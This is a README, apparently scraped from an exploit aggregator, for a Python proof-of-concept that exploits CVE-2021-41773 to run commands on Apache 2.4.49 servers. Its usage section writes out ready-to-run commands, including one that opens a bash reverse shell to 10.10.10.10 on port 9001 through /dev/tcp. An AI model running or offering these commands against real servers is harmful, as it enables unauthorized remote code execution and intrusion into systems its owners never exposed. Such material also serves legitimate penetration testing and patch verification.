Share
## https://sploitus.com/exploit?id=DC9A7EFD-9812-58EC-87D5-3D39DA449BFB
# CVE-2021-41773 - Remote Code Execution in Apache 2.4.49

PoC for [CVE-2021-41773](https://nvd.nist.gov/vuln/detail/cve-2021-41773) as I just found over-complicated exploits and this one goes straight to the Remote Code Execution.

---

## Usage

Just specify the IP address running the vulnerable `Apache 2.4.49` server with `-i` and the desired system command with `-c`. If the web server is not running on port `80` we can specify it with `-p` and if the web server is using HTTPs you need to use `--use-https` flag.
```shell-session
$ python3 CVE-2021-41773.py -i 10.10.10.10 -c 'id'

$ python3 CVE-2021-41773.py -i example.com -p 8080 -c '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'

$ python3 CVE-2021-41773.py -i 20.20.20.20 -p 443 --use-https -c 'whoami'
```

Use it under your own responsability (:

Be ethical.